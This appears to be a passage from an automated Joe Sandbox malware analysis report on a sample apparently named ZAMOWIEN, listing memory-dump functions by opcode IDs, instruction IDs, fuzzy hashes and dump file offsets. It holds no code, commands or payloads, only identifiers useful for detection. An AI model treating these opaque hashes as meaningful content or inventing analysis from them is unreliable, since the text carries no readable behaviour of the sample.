                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                            • Instruction ID: 8efeb26f8bd845f089f26c578e0a61febd3d130e22b335fda38e2bd1256f00eb
                                                                            • Opcode Fuzzy Hash: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                            • Instruction Fuzzy Hash: 8711947E604608AFEB05DF78C940B9AB7F5EF89358F144459D89A97302DBB0E941CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5c269ba4a535659ec4c83c61d1d1dad5caee24bb73b9b86fc5a749bb5c692a8
                                                                            • Instruction ID: 0db73498fcd52fe2003267d6f36a026edd3974c1d16f703bf1975bb442d0c67f
                                                                            • Opcode Fuzzy Hash: f5c269ba4a535659ec4c83c61d1d1dad5caee24bb73b9b86fc5a749bb5c692a8
                                                                            • Instruction Fuzzy Hash: CD212AB9E00619DFEB08CF98D840BEDF3B1FB48725F208259D529A7280DB756952CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                            • Instruction ID: 53d0bee861fc8bb0130005b87fa21bce8b5b46beaf15ab13b10f36a316e4282d
                                                                            • Opcode Fuzzy Hash: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                            • Instruction Fuzzy Hash: AD119339A00705EFEB158F60C814F56BBAAFF85394F148599D8429B680EB71A942CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                            • Instruction ID: 7fb6bde630314bd59201bf9174460e6794b5fdd621dc1190faf007da8c134b4a
                                                                            • Opcode Fuzzy Hash: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                            • Instruction Fuzzy Hash: ED11087A282B54BFD7264F09CD85F1B3B7AFF88F84F014028B6055B2A0CA79CC50DA90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                            • Instruction ID: 57d927f767e31fb80db287fc16a724b6a3dd9d530db5b7cb506673487ba229ac
                                                                            • Opcode Fuzzy Hash: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                            • Instruction Fuzzy Hash: EC114476604208BFCB068F6CD8808BEBBB9EFD5348F10806AF944DB350CA758D50C7A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db1b1ecd0a8c52e6951a7113c3c996ac4fae3036cbd07f243ff742d1acc422ec
                                                                            • Instruction ID: 823e5858803930917e14fc2dc68356e39387060f7c321936e4e90b076aa18b74
                                                                            • Opcode Fuzzy Hash: db1b1ecd0a8c52e6951a7113c3c996ac4fae3036cbd07f243ff742d1acc422ec
                                                                            • Instruction Fuzzy Hash: CA01967EB007446BE7109B6D9C80F6B77E8EF84354F040469E619D7281DAB4F901C661
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                            • Instruction ID: 8573b575cb17d971d1b5520da701af37053916821839e0f0dabda97bc3939cdb
                                                                            • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                            • Instruction Fuzzy Hash: 05015E7AB00249EB9B09CAA6D954DAF7BBDEF85B88F000059A915D7200EF74EA45C770
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4de456b7d7e9e238a9414b1d7dc63a16e345f7493b613247f52e3d533c4ba137
                                                                            • Instruction ID: 919a0b16fdf4da89ab7c8e86e5d56e26c91a2ea494cc5384f2b71dbdacbc76d9
                                                                            • Opcode Fuzzy Hash: 4de456b7d7e9e238a9414b1d7dc63a16e345f7493b613247f52e3d533c4ba137
                                                                            • Instruction Fuzzy Hash: 33119AB5600754AFE711CF68C841B9B77E9FB44358F018829E996DB210DB75EC40CBB0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cec40e1d77f2c24f0288e58e2a398fc6f2c357b6d72b3eb0534291a60e41c089
                                                                            • Instruction ID: 14d30480bbac4e3c325473c8662cf5d6b71ed7fb3a5c67809c40d363fea1b5a8
                                                                            • Opcode Fuzzy Hash: cec40e1d77f2c24f0288e58e2a398fc6f2c357b6d72b3eb0534291a60e41c089
                                                                            • Instruction Fuzzy Hash: AB11E579A017489FD711CF69C844B9EB7A8FF54704F180076EA05E7282DB79E901C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                            • Instruction ID: 43931e655e3fc29e5291823c0f0bb203cacb7b2a7eaf3c5909a7e663ee294fdb
                                                                            • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                            • Instruction Fuzzy Hash: 7001807E140515BFE7129F65CC80E92F77DFB94794B804525F26442560CB71ACA0CAA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 622d4d4adefbb1b3d6c2ad46aa8559ae3d92daac583b414ef75ee5ef38a9c34f
                                                                            • Instruction ID: e88249be3d2501fe7b87402074e5599a6a8042564d5e7ad44b0ce11218dfe30f
                                                                            • Opcode Fuzzy Hash: 622d4d4adefbb1b3d6c2ad46aa8559ae3d92daac583b414ef75ee5ef38a9c34f
                                                                            • Instruction Fuzzy Hash: 22019277141710EBE3229A25CC44E5677AAFF417A4B108129E5668F280DAA1DC41CBE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                            • Instruction ID: 9a05e6568e865206b1544bcb2741506e6ebf75d73dae0cb9963c661634209341
                                                                            • Opcode Fuzzy Hash: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                            • Instruction Fuzzy Hash: F201B53A141A60BFE3228F4DCD80F96BB69FF62B54F518410B6455B5B0C7A4EC90DA80
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 38087e7e14ff471817135ef7b8e0920bbdb512136d61ac4296d2784ba3724674
                                                                            • Instruction ID: b6cc549b982ac96f143f7d70c3667afb1486ac40440c8b158f0f46b23d7638eb
                                                                            • Opcode Fuzzy Hash: 38087e7e14ff471817135ef7b8e0920bbdb512136d61ac4296d2784ba3724674
                                                                            • Instruction Fuzzy Hash: D2116179A02349AFDB04DFA9D855F9E7BF8EF44740F004026B914EB390DA74DA01CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                            • Instruction ID: 81eb4e4d0378bccf885ea8b9b87df21b382c07ccf5714949011e313eaa5f9ec6
                                                                            • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                            • Instruction Fuzzy Hash: A411AD77800B01DFE3218F15C880B12B3E5BF407A6F15C86CD49A4F4A6C774E881CB60
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                            • Instruction ID: 55b2f966c9c540f3ba3068113e2ee4573910c5ac4c4ebc05fc1716d6d79d6594
                                                                            • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                            • Instruction Fuzzy Hash: AC01867E700205EBCB168A9ADD41EDB7A6CEF94B84F158029B915D71A0EE70E941C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                            • Instruction ID: 03401084ec9b29ece523f916801b02b38e4b1dea2293bc4d9ff953a397f4f28f
                                                                            • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                            • Instruction Fuzzy Hash: CB01D4BEA01344DFE7118A58E804B5577A9EB8472CF108117FE388B280DFB4E981C791
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 33b5c47cbcc0c6bb709526ea31a25b665744462fd735ea33b6fe07ec0a4ac443
                                                                            • Instruction ID: 9007212ef2f5aa81b587712a4cce82877777ae01f500c9310577b2abd1a31722
                                                                            • Opcode Fuzzy Hash: 33b5c47cbcc0c6bb709526ea31a25b665744462fd735ea33b6fe07ec0a4ac443
                                                                            • Instruction Fuzzy Hash: 6C019E79A12248AFDB04DF69D851FAEBBB8FF44310F004026B910EB280DAB4DA01CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fdc617ef37de8c9f61f559291fbac2d60d85c94cb02de5821e709a75a9fbb926
                                                                            • Instruction ID: cd5c970814dfbf9b828f1153d3d616eb6a12c0c2a4c44bf298958ddfa8195d1f
                                                                            • Opcode Fuzzy Hash: fdc617ef37de8c9f61f559291fbac2d60d85c94cb02de5821e709a75a9fbb926
                                                                            • Instruction Fuzzy Hash: 8E017579A11348EFDB04DFADD851F9EB7B8EF44704F404056B914EB281DAB5DA01CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f30c0d3aa4d8dbd25c58e4e00267b776eb9c7ccd946b89beb257b6ba2c9ccf1f
                                                                            • Instruction ID: a258a4e7d7ce87549dc94e2a74047150f89bd7a512fe8ee26dcde265311c06f5
                                                                            • Opcode Fuzzy Hash: f30c0d3aa4d8dbd25c58e4e00267b776eb9c7ccd946b89beb257b6ba2c9ccf1f
                                                                            • Instruction Fuzzy Hash: A1019279A01318ABDB04DFA9D855F9FBBB8EF44314F004016B950EB280DAB8EA01CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b4f155255f24d15444df466dc23006aea64b4cca6c351e3ed4f4ed3d0e5d81d3
                                                                            • Instruction ID: 6d15f151da172f032a313155708d9aad140710fb880a5de562e440d993a3091f
                                                                            • Opcode Fuzzy Hash: b4f155255f24d15444df466dc23006aea64b4cca6c351e3ed4f4ed3d0e5d81d3
                                                                            • Instruction Fuzzy Hash: EF019279A11348ABDB04DFA9D855F9EB7B8EF44714F004016B910EB380DAB9EA01CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16a48a9e22932eea0986d020ee3606d7f922a0bf5e29211d28b5c8895691cd57
                                                                            • Instruction ID: 939773a427d10ac544e00d857dd21c850aeb3e3560729a34c16b076785f73853
                                                                            • Opcode Fuzzy Hash: 16a48a9e22932eea0986d020ee3606d7f922a0bf5e29211d28b5c8895691cd57
                                                                            • Instruction Fuzzy Hash: F9018479A11358EBDB14DBA9D815FAF77B8EF54704F044066B910EB280DAB8D901C794
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                            • Instruction ID: 38792bee78ed2d2a848d72615568c9d705a54504e6cd24017e64cb5e97519b57
                                                                            • Opcode Fuzzy Hash: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                            • Instruction Fuzzy Hash: 52110A79640A84CFD365CB08C595BA5B7A1EB88B14F14843CD45E8BA80CF79A886DF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 435a378b341f3d9c7e045aa6caab2d59c6e852b34d3ac6486d2d1bcc1f364d72
                                                                            • Instruction ID: e30b3327c37f2c2d7f57d96112bce30dcc1c2c6ac7cec0df3f0d58e2091d7599
                                                                            • Opcode Fuzzy Hash: 435a378b341f3d9c7e045aa6caab2d59c6e852b34d3ac6486d2d1bcc1f364d72
                                                                            • Instruction Fuzzy Hash: 48115B78D11259EBCB04DFA8D441A9EB7B4EF18304F14845AA914EB381D774DA02CBA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                            • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                            • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                            • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 446e58d916ff1ab340bbe76adb383b37d7478005daf057f65e7e26dc8cab9700
                                                                            • Instruction ID: 50ecb737ab3e72242d4ef953aba3d64b94a0b43df0c88eb25cc973ac131c6944
                                                                            • Opcode Fuzzy Hash: 446e58d916ff1ab340bbe76adb383b37d7478005daf057f65e7e26dc8cab9700
                                                                            • Instruction Fuzzy Hash: 4B011EB5A11219ABDB04DF69D94599EB7B8EF48344F50405AE914F7380D678E9018BA0
                                                                            Memory Dump Source
